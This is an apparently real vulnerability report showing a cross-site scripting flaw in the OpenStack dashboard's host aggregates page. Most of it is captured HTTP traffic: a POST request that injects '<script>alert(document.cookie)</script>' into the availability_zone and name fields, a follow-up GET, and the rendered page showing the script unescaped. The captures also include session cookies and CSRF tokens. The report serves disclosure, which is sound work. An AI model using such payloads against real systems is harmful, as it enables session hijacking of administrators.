/admin/aggregates/ is subject to reflected cross site scripting issue. The impacted parameter is availability_zone. For example, here is the request for the update: POST /admin/aggregates/1/update/ HTTP/1.1 Host: 23.253.125.245 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://23.253.125.245/admin/aggregates/ Content-Length: 192 Cookie: csrftoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK; sessionid=".eJytV1lzG0UQDo5jJ3YuAjEhHDG3wiHNPbvhSgiEACGAyVbpxaWaa7Mi0q5H2nXIw1bBC_-HP8Q7_4KelUQChQ7AerBnZ2e_6e-b7p7un9Zq_1QrOVvlY1McONsriwcuT3axNphTwgQXGGtFIyaUVnFEUiMiitJksxq7Ua9vu7vHjh3TEeWKGMKVwizmaay5xQx-lMeWI-HXku2Ru98v8l6uhu5ucqanqjLrTTGyteTc9LXL7UHRz8vuFYDNyvLgWqdDaJtw2saEtwnj1zhCqHNI2sgfT84BwGHfuHFv8n33FHy21wy_yZ1fTy48sZFWBrjZ5E0gmo9LeGpetqfz7a_co3FZ5O6T6bozAzUue8qU_cN--ejLX2_9_n1yotHH_A0hwG_dC2-2_ImrP_uN2m-2kg1bDFU_9ydrf6qVrPWt37qbrAcB_PbdKjk7tf2mKtWguO9P7_szrdqfbTUkZkKM_bl9f772T7e6J2Fa2WE_T_bu-Avdj-YqFEnJQKGOcpGRPLVpTCVDkdUaE8tTrAnBShDe3QCIiXD-mWy9uwaPYOWzzZnGEY0lFixOGWeWW0WkVQ4pEmOpXKq722F1XrpRrgbBootHYVGgflDpQd8EyJ0jgPTPVap77klFe4N-_mDsL-1312G6fHTg_PPdTRiaYnhQla6Zbo7p8mRYHKqq9i-0MjiKF2v_Uiu70H1hrmGxiEUne-avrphNROWSRQ4zjqWImOIukohyw1KMuTKakuziUuCdZSsqlV3azyaMclc-LEYPssvTp6ocFTlwebnhcqX2u4HLQpHFKiLPoYtjbWKjU2qZYFLzSJmYOh2ZNDJEWZYt8ZnV9l7iJSuBzEQLMXZYDKqhOySgWng0_dxCpBKQ7ZVGtldr_1qQ7aUlvknnqMKoSmPBeapSyqRAEdII0VgJSJ9gpQJVlkPvLF8z43TqsWvDh5ebqA8-DStq_3pD6Y3avxkoXZ6LSeE3h4_UwqhYwPkawRCmilinLMURgQuAaQl8luDuLFkwYxIS1DhQmAzA_Lca8yFtXl1sfkxiMsd8aqlwXHIljGTaOS1TDJdcStI0tRqJheY3uIvMDwtm5p8IGXOo7rvpIdwfqNw4YPF2w-Kd2r8bWFxfdLBx5xC30X8NSCkdQiRCsNgxgmVMGSQeSyS4ImXUAtcj2X3nSGCeDEoLt6RW4yBdkBHy2GFQ7r1GuXbtO0sisika8BxZREog_GBHJiRLtdbMMRUpHklHIiz14oicQi-MyMmaGaGzISIHRWXTYjRUJdiSTa6azKkSWKGGFa49WSU94__qDaFUg2ouNpRBqAoTcwx_IGaxIBYKvRXS8wp7L0_Py0Fmwm38mZ6nITRJziAZbSRjtedBsquLdqSdWdXYuRHKqTnqIMSMUZzGqXLMIBMRzR2WHEdOEJNyUGfVbW6GswYh_tX6GefjoXYx4TaajoCtaNjK2kdLHARI_A8HQUK7SFjDGBfMOqQFtYQ6BMndKh4vcZBV917oICuCzMQ6A0jFyGRuXI7-IbDiRrdrtX9_8XURwaU8TxNiZRQZRA2xLFJSoRiKudRFKbM4bTS5uRA30LmR3LvdW0GYI0KaqXM6qKN_cKZ8Dzqd0SyZjh_206DOB406H9b-o6DO7vwrmVMumxZsjkZEpDiSMTYaWah2kMbGYIpDlnVG6pBPV-jvsp3s-JNXQN-6vIRObFqXPZi2a5VLToyKgRv7j_f9dSgFbkwX9IZuqKHvG9f-E5g6P3WD3qRxKx7mbgSvbk5FaDqrsYNWOPSKk9YNelP_abJpXaqqQek_Szbdjwf9EWx1y8CF5Mr-0G39OfCfJ1ubv53cfu7i001mGheRQLg9_b-VlGbL376657_4Zc9_mWwejIpwEv6r2t9pZVuNcEubma-z7cfWeugi14O5_pvafwsY2dpfXn9XNV3nXrILZVgaM6y1krGwyFqEoC1nUIFCia619N8nG6XLVV76e9mdSlftPwAqQEGv:1XGyHp:Um-2q06zpKC9jj_-kA_gP0kXeAk"; horizon.tabs=%7B%22undefined%22%3A%22%23launch_database__setinstancedetailsaction%22%7D Connection: keep-alive Pragma: no-cache Cache-Control: no-cache csrfmiddlewaretoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK&name=invisible_to_admin%3Cscript%3Exss%3C%2Fscript%3E&availability_zone=invisible_to_admin%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E The response is the following: HTTP/1.1 200 OK Date: Mon, 11 Aug 2014 22:42:13 GMT Server: Apache/2.4.7 (Ubuntu) X-Horizon-Location: /admin/aggregates/ Vary: Cookie Set-Cookie: sessionid=".eJy1V1l320QULmmWNqEJdKElLA27C9SeXVJZS9kpLaTVOX7J8ZlNlYktZWwppQ86B174Z_wN3vkX3JHlsKW2ywl-SEYazb33--auPy1V7qlWvFlmY50fWNMr8n2bxTtYacwpYYILjJWkIRNSySgkiRYhRUm8Vo7tqNc33Z1Tp06pkHJJNOFSYhbxJFLcYAY_yiPDkXBL8cbIPujnWS-TQ3snPteTZZH2GhnpUrzVbNvMHOT9rOheBbFpURzc6HQIbRNO25jwNmH8BkcIdQ5JG7nT8RYIOOxrO-5NznfPwrHdenk3s245Pv8XRUpqwGbiNwFoNi7gqd5sN-_b39hH4yLP7CfNd-cGclz0pC76h_3i0de_fv77vXil5kf_Q4IXv37f76y7lWs_u9XKrbXiVZMPZT9zZyp3thUv9Y1bvxMvewLcxp0y3mxsvyULOcgfuKf33LlW5TZb3S0AMSVi3Bv0s_2x29qrsR29ds_suWcrd77VPQOvpRn2s3j3trvQ_fCxxIVBwIC4jrShDnhikogGDIVGKUwMT7AiBEtBeHcVREz4dBfT5VrvQakGfe01XDoBDe657hIIAUYu1_4ThTQKsGBRwjgz3EgSGGmRJBEOpE1Ud8N_nRV2lMmBN-LKCRhRyu4yCCkeHVj3fHcNljofHpSFrV_X17Q9WeaHsqzcC610ay8F2l-s3Eut9EL3hceaEIlIdNKLf_fG9NLcExM2eMBCixnHgQiZ5DYMEOWaJRhzqRUl6ZV5gkqZThBltniYj_bT7eapLEZ5BlhenmK5Wrkdj2UmnWIROo-BewJCJ4zgSOlIq4QaJligeCh1RK0KdRJqIg1L5_jDQrpq0nwwHeaDcmgPCbDmH3U_MxCpBGh7ZUrbq5V7zdP20hwvpMewMv_MBDSjMokE54lMKAsECpFCiEZSQJYFJBJAzxVVYzr7p2uD8O06vL1Pw3blXp9CeqNyb3pI24-VSeF3DJ45ByZgAiW0jATcnRYMYSqJsdJQHBIoEkwFAGa2nBqJTxpjD2GyAPPfmpoPmfPabPMjEpEnMr8-MDGfGiosD7gUOmDKWhUkGAphQpIkMQqJmeZ7ObX5Kz6LDeUD21zCg4HMtAUUb09RvFO5dz2Kj2ddbNQ5xG30XwLyRMQ2FxpYhEiIYNMygoOIMshOhgTgrZRRA4ychLajoDRQJZUce-o8jZDHDj1z16fMtSvXmRORdd-AnywimzMTzCIhEH5gFRMBS5RSzDIZSh4GloQ4ULMjciKqBrTpI3KQlybJR0NZgCHppNSkVhaACk1R4cqRRdIz_j_S8wJCm0wFLR90hZGmDMJZ6Ihj-ANxjQUx0DAukJ7n66qJWz1Kz00ITZIzUEanlLHKcU_ZtVkaaWfaOHZu-tbpGHYWPX_L32NDBEJMa8lplEjLNNIhUdzigOPQCqITDkQ8kdga82nf9mlfjZoVoBVTtEHlwjkOAkadvIMsKrThRSgbCqMZ44IZi5SghlCLoAAYyaM5DrKgrpqscyAmH-nUjovRMYEVTXm7Ubn3ZpeLEAruMZzcmnnA23kzvv9lb1FiiAnCUCOqiWGhDCSKoOlLbJgwg5OamBNSWLPztGdH_WB1cR0mndE0mY4f9hPPzvtTdj6o3IeenZ3Hl2ROeVBPYf_mKD3doCMiwWEQYa2QgW4GKaw1pthnUasD5fPlAmPeUQnoG5sVMIk1fdl-M66VNl4Z5QM7dh_tuY-hD7jZfNAb2qGCuW9cuU_g1TONG_Qmg1v-MLMj2LrVkFCPUGMLo7CfFSejG8ym7tN4zdhEloPCfRav2R8P-iNQ9bmGgmSL_tCuHy3cF_H62m9nNi5ferbOTOM8FAi3m__rcaHX3ZfXdt1Xv-y6r-O1g1Hub8J9U7nbrXS9Zmzu4PRtuvGntQ6myGVvrrtbue9ARrr0t-3vy3rq3I13oMVKIoaVkkEkDDIGIRjLGbSW0ForFbh78WphM5kV7n56u1Rl-w8FGkG3:1XGyI9:Z4FqhXc2db7HwwtZeSi0DIW8YRQ"; httponly; Path=/ Set-Cookie: messages="3b207814661220efb902165acec019e6a6d9fbc3$[[\"__json_message\"\0540\05425\054\"Successfully updated aggregate: \\\"invisible_to_admin.\\\"\"]]"; Path=/ Content-Length: 0 Content-Type: text/html; charset=utf-8 Age: 0 Via: 1.1 540554-SAT6WWSG03.secops.rackspace.com The GET request looks like: GET /admin/aggregates/ HTTP/1.1 Host: 23.253.125.245 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://23.253.125.245/admin/aggregates/ Cookie: csrftoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK; sessionid=".eJy1V1l320QULmmWNqEJdKElLA27C9SeXVJZS9kpLaTVOX7J8ZlNlYktZWwppQ86B174Z_wN3vkX3JHlsKW2ywl-SEYazb33--auPy1V7qlWvFlmY50fWNMr8n2bxTtYacwpYYILjJWkIRNSySgkiRYhRUm8Vo7tqNc33Z1Tp06pkHJJNOFSYhbxJFLcYAY_yiPDkXBL8cbIPujnWS-TQ3snPteTZZH2GhnpUrzVbNvMHOT9rOheBbFpURzc6HQIbRNO25jwNmH8BkcIdQ5JG7nT8RYIOOxrO-5NznfPwrHdenk3s245Pv8XRUpqwGbiNwFoNi7gqd5sN-_b39hH4yLP7CfNd-cGclz0pC76h_3i0de_fv77vXil5kf_Q4IXv37f76y7lWs_u9XKrbXiVZMPZT9zZyp3thUv9Y1bvxMvewLcxp0y3mxsvyULOcgfuKf33LlW5TZb3S0AMSVi3Bv0s_2x29qrsR29ds_suWcrd77VPQOvpRn2s3j3trvQ_fCxxIVBwIC4jrShDnhikogGDIVGKUwMT7AiBEtBeHcVREz4dBfT5VrvQakGfe01XDoBDe657hIIAUYu1_4ThTQKsGBRwjgz3EgSGGmRJBEOpE1Ud8N_nRV2lMmBN-LKCRhRyu4yCCkeHVj3fHcNljofHpSFrV_X17Q9WeaHsqzcC610ay8F2l-s3Eut9EL3hceaEIlIdNKLf_fG9NLcExM2eMBCixnHgQiZ5DYMEOWaJRhzqRUl6ZV5gkqZThBltniYj_bT7eapLEZ5BlhenmK5Wrkdj2UmnWIROo-BewJCJ4zgSOlIq4QaJligeCh1RK0KdRJqIg1L5_jDQrpq0nwwHeaDcmgPCbDmH3U_MxCpBGh7ZUrbq5V7zdP20hwvpMewMv_MBDSjMokE54lMKAsECpFCiEZSQJYFJBJAzxVVYzr7p2uD8O06vL1Pw3blXp9CeqNyb3pI24-VSeF3DJ45ByZgAiW0jATcnRYMYSqJsdJQHBIoEkwFAGa2nBqJTxpjD2GyAPPfmpoPmfPabPMjEpEnMr8-MDGfGiosD7gUOmDKWhUkGAphQpIkMQqJmeZ7ObX5Kz6LDeUD21zCg4HMtAUUb09RvFO5dz2Kj2ddbNQ5xG30XwLyRMQ2FxpYhEiIYNMygoOIMshOhgTgrZRRA4ychLajoDRQJZUce-o8jZDHDj1z16fMtSvXmRORdd-AnywimzMTzCIhEH5gFRMBS5RSzDIZSh4GloQ4ULMjciKqBrTpI3KQlybJR0NZgCHppNSkVhaACk1R4cqRRdIz_j_S8wJCm0wFLR90hZGmDMJZ6Ihj-ANxjQUx0DAukJ7n66qJWz1Kz00ITZIzUEanlLHKcU_ZtVkaaWfaOHZu-tbpGHYWPX_L32NDBEJMa8lplEjLNNIhUdzigOPQCqITDkQ8kdga82nf9mlfjZoVoBVTtEHlwjkOAkadvIMsKrThRSgbCqMZ44IZi5SghlCLoAAYyaM5DrKgrpqscyAmH-nUjovRMYEVTXm7Ubn3ZpeLEAruMZzcmnnA23kzvv9lb1FiiAnCUCOqiWGhDCSKoOlLbJgwg5OamBNSWLPztGdH_WB1cR0mndE0mY4f9hPPzvtTdj6o3IeenZ3Hl2ROeVBPYf_mKD3doCMiwWEQYa2QgW4GKaw1pthnUasD5fPlAmPeUQnoG5sVMIk1fdl-M66VNl4Z5QM7dh_tuY-hD7jZfNAb2qGCuW9cuU_g1TONG_Qmg1v-MLMj2LrVkFCPUGMLo7CfFSejG8ym7tN4zdhEloPCfRav2R8P-iNQ9bmGgmSL_tCuHy3cF_H62m9nNi5ferbOTOM8FAi3m__rcaHX3ZfXdt1Xv-y6r-O1g1Hub8J9U7nbrXS9Zmzu4PRtuvGntQ6myGVvrrtbue9ARrr0t-3vy3rq3I13oMVKIoaVkkEkDDIGIRjLGbSW0ForFbh78WphM5kV7n56u1Rl-w8FGkG3:1XGyI9:Z4FqhXc2db7HwwtZeSi0DIW8YRQ"; horizon.tabs=%7B%22undefined%22%3A%22%23launch_database__setinstancedetailsaction%22%7D; messages="3b207814661220efb902165acec019e6a6d9fbc3$[[\"__json_message\"\0540\05425\054\"Successfully updated aggregate: \\\"invisible_to_admin.\\\"\"]]" Connection: keep-alive And the response contains the injection XSS payload: HTTP/1.1 200 OK Date: Mon, 11 Aug 2014 22:42:14 GMT Server: Apache/2.4.7 (Ubuntu) Vary: Accept-Language,Cookie,Accept-Encoding X-Frame-Options: SAMEORIGIN Content-Language: en Set-Cookie: csrftoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK; expires=Mon, 10-Aug-2015 22:42:14 GMT; Max-Age=31449600; Path=/ Set-Cookie: sessionid=".eJy1V1tz20QULmkubUIbWiiXQGm4FQeovXdJBUpLuBQoBUI145eMZ2-qTG0pa0spfdAMvPDT-Bm88y84K8u0MIntMsEPyUqrPed8357rL0uVe6YVny-zsc4PrOkV-QObxdtYacwpYYILjJWkIRNSySgkiRYhRUm8Vo7tqNc33e1Tp06pkHJJNOFSYhbxJFLcYAY_yiPDkXBL8cbI3u_nWS-TQ3s3PteTZZH2GhnpUrzZbNvMHOT9rOheAbFpURxc73QIbRNO25jwNmH8OkcIdQ5JG7nT8SYIOOxrO-5NznfPwrG9evldZt1yfPEJRUpqwGbiqwA0GxfwVG-2m_ftb-yjcZFn9tPmu3MDOS56Uhf9w37x6Ovfv_jzx3il5kf_S4IXv37P76y7lZ1f3Wrl1lrxqsmHsp-5M5U724qX-sat342XPQFu424Zn29s35WFHOT33bP77lyrcudbNYgpEWO3ue-eq9yFVvcMvJZm2M_ivTvuYvfGsQyFQcCAoY60oQ54YpKIBgyFRilMDE-wIgRLQXh3FURMiHPPp8vdDXgElXaUyYHX8cJJ6FjyQo27VDtKFNIowIJFCePMcCNJYKRFkkQ4kDZRNfSDUg362hvw4gkY4F4qZXfzSUZ7g372YOxe3u8uw-vi0YF1r3TXYKnz4UFZ2Pp1fU1bk2V-KMvKvdpK4Speq9zlVnqx--qxhkUiEp30-X-6YvrC3BMThnjAQosZx4EImeQ2DBDlmiUYc6kVJemL8wSVMn15P50gymzxMB89SLeap7IY5Rlgeb3GcqVy2x7LTJLFIiQfAfcEhE4YwZHSkVYJNUywQPFQ6ohaFeok1EQals7xkoV0TUnzMXaYD8qhPSTAmn_U_cxApBKg7Y2atjcr95an7fIc36RHsDL_zAQ0ozKJBOeJTCgLBAqRQohGUkCKBSQSQM8VNcV09rFrg_ytOuq9T8MXlXu7hvRO5a56SFvHyqTwOwLPnAMTMIESWkYC7k4LhjCVxFhpKA4JVAimAgAzW84Uic8lYw9hsgDz363Nh7S5M9v8iETkqcyvD0zMp4YKywMuhQ6YslYFCYYqmJAkSYxCYqb5Xs7U_BWfCofyvm0u4f5AZtoCivdqFO9X7gOP4uasi406h7iN_ktAnojY5kIDixAJEWxaRnAQUQbZyZAAvJUyaoCRk9D2ZFAaqJJKjj11nkbIY4eeuWs1c-3KdeZEZN004KeLyObMBLNICIQfWMVEwBKlFLNMhpKHgSUhDtTsiJyImgI67yNykJcmyUdDWYAt6aTUpFYWgArVqHDlyCLpGf8f6XkBoU2mgn4PWsJIUwbhLHTEMfyBuMaCGOgWF0jP83VNiVv9Oz03ITRJzkAZrSljleOesp1ZGmln2jV2bvl26gh2Fj2_6y-xIQIhprXkNEqkZRrpkChuccBxaAXRCQcinkrsFPNp37toX42aFaAVNdqgcuEcBwGjTt5BFhXa8CKUDYXRjHHBjEVKUEOoRVAAjOTRHAdZUNeUrHMgKR_p1I6L0RGBFdW8Xa_ch7PLRQgF9whOdmce8Hbeiu_d7i1KDDFBGGpENTEslIFEETR9iQ0TZnBSE3NCCqfsPOvZUT9ZXVyDSWc0Tabjh_3Es_NRzc7Hlbvh2dk-viRzyoN6BDuCowUGtwY_EQkOgwhrhQz0O0hhrTHFPs9aHSjIqOnpJ0tA39isgEms6cseNONaaeOVUT6wY_fJvrsJrcCt5oPe0A4VzH3jyn0Kr55r3KA3Gdzyh5kdwdZuQ0I9WY0tjMJ-VpyMbjCbus_iNWMTWQ4K93m8Zn8-6I9A1RcaCpIt-kO7_vfCfRmvr_1xZuOlSxfqzDTOQ4Fwu_m_Hhd63d3e2XNf_bbnvo7XDka5vwn3TeXutNL1mpK5w8y36cZjax1MkcveXPdd5b4HGenSP7Z_KOupcy_ehi4riRhWSgaRMMgYhGAsZ9BdQnetVOB-jFcLm8mscPfSO6Uq238BBl5BxA:1XGyIA:-6Qt3ZZ7PkdNVpPYJOElOMzR-9k"; httponly; Path=/ Set-Cookie: messages=; expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/ Content-Type: text/html; charset=utf-8 Content-Length: 14400 Age: 0 Via: 1.1 540554-SAT6WWSG03.secops.rackspace.com Host Aggregates - OpenStack Dashboard

OpenStack Dashboard

×

Success: Successfully updated aggregate: "invisible_to_admin<script>xss</script>."

Project

Object Store

Orchestration

Admin

Identity Panel

Host Aggregates

Host Aggregates

Create Host Aggregate
Name Availability Zone Hosts Metadata Actions
invisible_to_admin<script>xss</script>invisible_to_admin<script>alert(document.cookie)</script>
  • availability_zone = invisible_to_admin
    • Edit Host Aggregate More
    Displaying 1 item

    Availability Zones
    Availability Zone Name Hosts Available
    internal
  • mxindevstack2 (Services Up)
    		• Yes
    nova
  • mxindevstack2 (Services Up)
    		• Yes
    Displaying 2 items